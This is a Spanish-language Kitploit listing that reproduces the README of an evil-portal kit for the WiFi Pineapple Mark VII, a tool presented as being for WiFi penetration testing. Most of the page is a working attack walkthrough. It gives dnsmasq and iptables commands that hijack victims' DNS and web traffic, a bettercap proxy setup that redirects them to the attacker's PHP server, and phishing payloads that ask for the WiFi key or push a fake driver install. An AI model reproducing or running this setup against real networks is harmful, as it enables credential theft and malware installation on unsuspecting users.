Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
WiFi-Pineapple-MK7_Evil-Portal — Kit de punto de acceso malicioso para pruebas de penetración WiFi, que despliega cargas de phishing de portal maligno para capturar credenciales y realizar ataques de ingeniería social en redes inalámbricas. | Kitploit
Herramientas/GitHubGitHub/tw-d/wifi-pineapple-mk7_evil-portal
Auditoría Wi-FiPhishingSeguridad InalámbricaPruebas de PenetraciónIngeniería SocialRed Teaming
GitHubtw-d/wifi-pineapple-mk7_evil-portal

WiFi-Pineapple-MK7_Evil-Portal

Kit de punto de acceso malicioso para pruebas de penetración WiFi, que despliega cargas de phishing de portal maligno para capturar credenciales y realizar ataques de ingeniería social en redes inalámbricas.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
117hace 2 añosAún no revisado

WIFI PINEAPPLE MARK VII - PORTAL MALIGNO

  • El principal punto de acceso rogue y kit de pentest WiFi para operaciones de acceso cercano.
  • Ataques pasivos y activos analizan dispositivos vulnerables y mal configurados.
  • https://hak5.org/collections/sale/products/wifi-pineapple

Autor:: TW-D

Versión:: 1.0.0

Copyright:: Copyright (c) 2024 TW-D

Licencia:: Distribuido bajo los mismos términos que Ruby

Requiere:: PHP >= 8.1, Ruby >= 2.7.0p0 y WiFi Pineapple Mark VII 2.1.3-stable

Instalación (Distribuciones Linux basadas en Debian)::

  • sudo apt-get install php8.1-cli php8.1-curl

  • sudo apt-get install build-essential ruby ruby-dev libpcap-dev

  • sudo gem install sorted_set bettercap

Descripción

Un portal malicioso (evil portal) es una técnica utilizada para engañar a los usuarios de una red Wi-Fi redirigiéndolos a una página web maliciosa en lugar de la página de autenticación o página de inicio esperada.

Nota : "Issues" y "Pull Requests" son bienvenidos.

Probado en

Sistema operativo con/sin navegador webTipo de notificación
Ubuntu 22.04Ninguno
Android 8.0.0Sistema
Microsoft Windows 10Ninguno
Raspberry Pi bookwormNinguno
Ubuntu 22.04 con Mozilla FirefoxAlerta
Microsoft Windows 10 con Mozilla FirefoxAlerta
Raspberry Pi bookworm con Mozilla FirefoxAlerta

Configuración

Hacker - Conectando a la WiFi Pineapple

Conecta la WiFi Pineapple a tu computadora mediante el cable USB-C.

WiFi Pineapple - Interfaz Web

Ajustes > Redes > Modo Cliente Inalámbrico: La interfaz wlan2 debe estar desconectada.

Hacker - Terminal 1

root@kitploit:~
hacker@hacker-computer:~$ ifconfig enx
enx: [...]
        inet 172.16.42.100  netmask 255.255.255.0  broadcast 172.16.42.255
[...]

(optional)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT     STATE  SERVICE
53/tcp   open   domain
5353/tcp closed mdns
53/udp   open   domain
5353/udp closed zeroconf
[...]

hacker@hacker-computer:~$ ssh [email protected]
root@mk7:~# dnsmasq --address=/#/172.16.42.1 --no-hosts --interface=br-lan --port=5353 --no-resolv
root@mk7:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto udp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 80 --jump DNAT --table nat --to-destination 172.16.42.100:8080
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 443 --jump DNAT --table nat --to-destination 172.16.42.100:8000
root@mk7:~# iptables --append POSTROUTING --jump MASQUERADE --table nat
root@mk7:~# exit

(optional)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT     STATE SERVICE
53/tcp   open  domain
5353/tcp open  mdns
53/udp   open  domain
5353/udp open  zeroconf
[...]

(optional)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 53 www.google.com
[...]
;; ANSWER SECTION:
www.google.com.		0	IN	A	172.16.42.1
[...]

(optional)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 5353 www.google.com
[...]
;; ANSWER SECTION:
www.google.com.		0	IN	A	172.16.42.1
[...]

hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ php -S 172.16.42.100:8000

Hacker - Terminal 2

root@kitploit:~
hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv4/ip_forward"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv6/conf/all/forwarding"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo bettercap \
--interface enx \
--gateway 172.16.42.1 \
--no-discovery \
--log ./logs/bettercap.log \
--silent \
--no-spoofing \
--proxy \
--proxy-port 8080 \
--allow-local-connections \
--no-sslstrip \
--no-http-logs \
--proxy-module ./EvilPortal.rb \
--redirect-url http://172.16.42.100:8000/

Hacker - Terminal 3 (Opcional)

root@kitploit:~
hacker@hacker-computer:~$ curl --head --interface enx "http://neverssl.com/"
HTTP/1.1 302 Found
[...]
Location: http://172.16.42.100:8000/
Cache-Control: max-age=0, private, must-revalidate

hacker@hacker-computer:~$ curl --head --insecure --interface enx "https://www.google.com/"
curl: (35) error:0A000126:SSL routines::unexpected eof while reading

hacker@hacker-computer:~$ exit

Uso y Carga de Payloads

En el directorio "./payloads/" encontrarás :

DESARROLLOAutorDescripciónCómo usar
skeleton.htmlTW-DPayload vacío destinado al desarrollo.Documentación
EJECUCIÓNAutorDescripciónCómo usar
web-camera.htmlTW-DSimula un video de vigilancia falso y solicita la instalación de un controlador para su funcionamiento.Documentación

web-camera

PHISHINGAutorDescripciónCómo usar
wifi_security-key.htmlTW-DSimula una actualización falsa del equipo de Internet y solicita la clave de seguridad WiFi para continuar.Documentación

wifi_security-key

Descargar herramienta